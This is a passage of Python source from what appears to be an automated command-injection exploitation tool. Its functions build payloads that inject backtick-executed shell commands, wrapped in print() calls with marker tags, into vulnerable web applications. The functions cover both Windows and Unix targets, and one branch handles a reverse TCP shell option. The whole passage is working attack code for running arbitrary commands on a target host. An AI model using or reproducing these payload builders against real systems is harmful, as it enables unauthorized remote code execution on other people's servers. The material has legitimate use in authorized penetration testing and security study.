"`echo " + TAG + "`." + 112 | "`echo " + TAG + "`)" + 113 | separator 114 | ) 115 | else: 116 | payload = ("print(`echo " + TAG + 117 | separator +python_payload + 118 | separator + "echo " + TAG + 119 | separator + "echo " + TAG + "`)%3B" 120 | ) 121 | 122 | else: 123 | python_payload = "python -c \"print str(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))\"" 124 | if settings.SKIP_CALC: 125 | if separator == "": 126 | payload = ("print(`echo " + TAG + "`." + 127 | "`echo " + TAG + "`." + 128 | "`echo " + TAG + "`)" + 129 | separator 130 | ) 131 | else: 132 | payload = ("print(`echo " + TAG + 133 | separator + "echo " + TAG + 134 | separator + "echo " + TAG + "`)%3B" 135 | ) 136 | else: 137 | if separator == "": 138 | payload = ("print(`echo " + TAG + "`." + 139 | "` " + python_payload + "`." + 140 | "`echo " + TAG + "`." + 141 | "`echo " + TAG + "`)" + 142 | separator 143 | ) 144 | else: 145 | payload = ("print(`echo " + TAG + 146 | separator +python_payload + 147 | separator + "echo " + TAG + 148 | separator + "echo " + TAG + "`)%3B" 149 | ) 150 | 151 | return payload 152 | 153 | """ 154 | Execute shell commands on vulnerable host. 155 | """ 156 | def cmd_execution(separator, TAG, cmd): 157 | if settings.TARGET_OS == "win": 158 | cmd = ( "for /f \"tokens=*\" %i in ('cmd /c " + 159 | cmd + 160 | "') do @set /p =%i < nul" 161 | ) 162 | if separator == "": 163 | payload = ("print(`echo " + TAG + "`." + 164 | "`echo " + TAG + "`." + 165 | "` cmd /c " + cmd + "`." + 166 | "`echo " + TAG + "`." + 167 | "`echo " + TAG + "`)" 168 | ) 169 | 170 | else: 171 | payload = ("print(`echo '" + TAG + "'" + 172 | separator + "echo '" + TAG + "'" + 173 | separator + " cmd /c " + cmd + 174 | separator + "echo '" + TAG + "'" + 175 | separator + "echo '" + TAG + "'`)%3B" 176 | ) 177 | else: 178 | if separator == "": 179 | payload = ("print(`echo " + TAG + "`." + 180 | "`echo " + TAG + "`." + 181 | "`" + cmd + "`." + 182 | "`echo " + TAG + "`." + 183 | "`echo " + TAG + "`)" 184 | ) 185 | else: 186 | payload = ("print(`echo '" + TAG + "'" + 187 | separator + "echo '" + TAG + "'" + 188 | separator + cmd + 189 | separator + "echo '" + TAG + "'" + 190 | separator + "echo '" + TAG + "'`)%3B" 191 | ) 192 | 193 | return payload 194 | 195 | """ 196 | __Warning__: The alternative shells are still experimental. 197 | """ 198 | def cmd_execution_alter_shell(separator, TAG, cmd): 199 | if settings.TARGET_OS == "win": 200 | if settings.REVERSE_TCP: 201 | payload = (separator +cmd + " " 202 | ) 203 | else: 204 | python_payload = ("for /f \"tokens=*\" %i in ('cmd /c " + 205 | settings.WIN_PYTHON_DIR + " -c \"import os; os.system('" + cmd + "')\"" + 206 | "') do @set /p =%i < nul" 207 | ) 208 | 209 | if separator == "": 210 | payload = ("print(`echo " + TAG + "`." + 211 | "`echo " + TAG + "`." + 212 | "` cmd /c " + python_payload + "`." + 213 | "`echo " + TAG + "`." + 214 | "`echo " + TAG + "`)" 215 | ) 216 | else: 217 | payload = ("print(`echo '" + TAG + "'" + 218 | separator + "echo '" + TAG + "'" + 219 | separator + " cmd /c " + python_payload + 220 | separator + "echo '" + TAG + "'" + 221 | separator + "echo '" + TAG + "'`)%3B" 222 | ) 223 | else: 224 | if separator == "": 225 | payload = ("print(`echo " + TAG + "`." + 226 | "`echo " + TAG + "`." + 227 | "`" + cmd + "`." + 228 | "`echo " + TAG + "`." + 229 | "`echo " + TAG + "`)" 230 | ) 231 | else: 232 | payload = ("print(`echo '" + TAG + "'" + 233 | separator + "echo '" + TAG + "'" + 234 | separator +cmd + 235 | separator + "echo '" + TAG + "'" + 236 | separator + "echo '" + TAG + "'`)%3B" 237 | ) 238 | return payload 239 | 240 | #eof --------------------------------------------------------------------------------